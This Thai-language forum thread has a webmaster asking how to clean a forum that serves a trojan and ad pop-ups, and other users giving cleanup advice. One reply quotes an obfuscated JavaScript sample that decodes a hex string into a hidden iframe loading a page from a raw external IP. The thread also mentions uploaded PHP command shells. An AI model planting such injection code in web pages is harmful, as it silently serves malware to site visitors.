ช่วยด้วยครับ ! เว็บฟอรั่มผมโดนโจมตี (มีรูปประกอบ)

[SU9799]

ช่วยด้วยครับ ! เว็บผมเป็นเว็บฟอรั่ม
เวลาเปิดเว็บครั้งแรกจาก ie และในทุกๆครั้งเมื่อคลิกเปิดดูกระทู้ มันจะเจอ โทรจัน ตลอดเลยอะครับ โชคยังดีที่เครื่องผม สามารถลบมันได้



อยากจะกำจัดมันไป ทำไงดีคร้าบ.... เอ้อ และอีกอย่างเวลาเปิดเว็บจาก ie มักมี pop up โฆษณา ติดมาด้วย เกือบทุกครั้ง ต้อง แก้ปัญหายังไง ครับ

ช่วยด้วยคราบ 

[superdog]

ลองวิว ซ๊อต ดู html ในหน้าเว็บของเราก่อนครับ ว่าต้นตอมันมาจากตรงใหน แล้วค่อยดำเนินการขั้นต่อไป ( ถ้ามันฝังไว้ที่เว็บเราเลยอ่ะนะครับ ถ้าในเครื่องเราก็ไม่ยาก )

[คนจน]

ลอง View Source ดูครับว่ามี Code อะไรที่มันประหลาดๆ หรือไม่ แล้วเอามาบอกกล่าวกัน
ผมคิดว่าน่าจะมีนะ

[SU9799]

พอดีว่าจะ ดึงไฟล์จาก ftp ออกมาแต่ ftp error (หมดระยะเวลาใช้ฟรี) กำลังโหลดมาใหม่ครับ 

ขอบคุณครับ

[หนึ่งสุดหล่อ]

ผมก็เคยเจอครับ อันนี้แสบมาก ให้เช็คดังนี้ครับ

1. เช็คดูทุกๆ html page เลย พวกนี้มันจะแฝงโค้ด javascript ที่เอาไว้ให้ไปโหลด trojan มา บางครั้งก็จะ encode url เอาไว้ด้วย แต่มันก็จะใส่ฟังก์ชั่นแปลงมาให้เลยอยู่แล้ว ถ้าแก้โค้ดเป็นก็สามารถตามสาวถึงตัวการได้ ไม่ใกล้ก็ไกล

2. เช็คดูไฟล์ php แปลกปลอมใน server ให้ดีๆด้วยครับ ขอย้ำว่า เช็คให้ดีๆ เพราะส่วนมากมาแบบนี้ ผู้โจมตีมักจะอัพ script php ที่เอาไว้ใช้ command line ทุกชนิดผ่านเวบได้ด้วย (rm -r ก็ทำได้)

[spiceday]

ไอ้ webstat ต่างประเทศ นี่แหล่ะตัวการสำคัญ เว็บผมเคย popup โฆษณาหน้า 1  ทุกครั้งที่เข้าเว็บ ผมก็ viewsource ดูทุกบรรทัด ไม่เจอ

เออหล่ะวะ.. หาไม่เจอ แต่มันก็ยัง popup อยู่ ก็เลยไล่ดูว่า script ไหนที่เราไม่ได้เขียนเอง ลองเอาออก ... Bingo ไอ้ webstat ต่างประเทศ นี่เอง (ไม่ใช่เว็บฟรีใหญ่อันดับ 1 - 2 นะครับ มันเป็น webstat เล็กๆ แต่มี function ใช้งานเยอะเหมาะกับทำ seo)

ตอนนี้เลิก popup แล้วครับ

[kanokk]

แนะนำ เปลี่ยนพาสของ โอสต์ กะ FTP ด่วนเลยคับ
แล้วก็ตามเชคไฟลล์ มองหาโคดแปลกๆดู
โหลดแบคอัพลงมาเครื่องเราด้วยนะคับ จะแก้ง่ายหน่อย

[ColdMoney]

โฮศติ้งที่ไหนเอ่ย คุ้นๆว่าถ้า เคยเจอว่าระบบความปลอดภัยบางที่มันห่วยเลยเจอฝัง script กันถ้วนหน้า  :

[เสรีพิลาศ]

มาช่วยชี้ทางสว่างให้ครับ ไม่เกี่ยวกับโฮสต์ครับ เกี่ยวกับเรานี่แหละไปติดโทรจันมา แล้วมันจำ ftp เราแล้วยิงผ่านทาง ftp มาฝังเว็บครับ

ไม่มีโฮสต์ที่ไหนติดไวรัสหรอก เรานี่แหละติดมาเอง

[SU9799]

 

ขอบคุณมากครับทุกท่าน

[SU9799]

หน้าแรกของเว็บ www.xxxxx.com พบว่า iframe ที่ดึงกระทู้มาโชว์หน้าแรก หายไป แก้ไฟล์แล้วครับ  น่าจะไม่มี pop up โฆษณา แล้ว 
แต่ที่ www.xxxxx.com/forum นี่สิครับ แก้ไม่ได้เลย มันก็ยังมี โทรจัน อยู่เหมือนเดิม......

ขอคำแนะนำด้วยครับ

hกกp://www.entertrend.com/forum

[technomatch]

ลองดูทั่วรึยังครับ.....ในไฟล์เทมเพลทของบอร์ดหล่ะ....

[คนจน]

Code ประมาณนี้หรือเปล่าครับ

โค้ด เลือก ขยาย

<iframe v4760e07610790(v4760e07610796){ function v4760e0761079f () {var v4760e076107a3=16; return v4760e076107a3;} return(parseInt(v4760e07610796,v4760e0761079f()));}function v4760e076107d3(v4760e076107d7){ function v4760e076107e6 () {var v4760e076107ea=2; return v4760e076107ea;} var v4760e076107dc='';for(v4760e076107e0=0; v4760e076107e0<v4760e076107d7.length; v4760e076107e0+=v4760e076107e6()){ v4760e076107dc+=(String.fromCharCode(v4760e07610790(v4760e076107d7.substr(v4760e076107e0, v4760e076107e6()))));}return v4760e076107dc;} document.write(v4760e076107d3('3C696672616D65206E616D653D276261626134363565383827207372633D27687474703A2F2F3232302E3133302E3132382E3137302F69632F73702F696E6465782E706870272077696474683D3731206865696768743D313836207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script></iframe>

ผมเคยโดนมันฝัง Code แบบด้านบนนะ
ถ้าเราลบ code นี้ออกมันก็จะกลับไปเป็นใหม่ครับ
วิธีแก้คือแจ้งให้เจ้าของ Host แก้ไขครับ
หายแน่นอน

[seubsamran]

ที่จริง Hosting เหมือนผ้าขาว 

แต่คนใช้อย่างเราๆนี่แหละทำให้กลายเป็นผ้าดำ     ผมเองเคยโดนมันยึดไปทั้งเครื่อง ทำภาพกวนตีนมาใส่ใน Index ทุกที่ ทุกโฟเดอร์

แสบจริงๆ   ตั้งอัพใหม่หมด 

[SU9799]

 

ขอบคุณอีกครั้งที่ให้คำแนะนำครับ
ผมแจ้งให้ทางโฮส เค้าจัดการเรียบร้อยแล้ว...

ว่างๆก็เชิญทุกท่านที่เว็บได้นะครับ ::)เผื่อจะช่วยให้ภาษาอังกฤษคล่องขึ้น

[Thenetwork]

ไม่ทราบว่าท่านใช้ Win หรือ Linux ครับ

และการใช้พวก Open Source มันมีช่องโหว่เยอะยิ่งถ้าเว็บท่านเปงเว็บไหย่ๆเนื้อหาเยอะท่านคงไม่มีเวลางมหารูรั่วนะครับ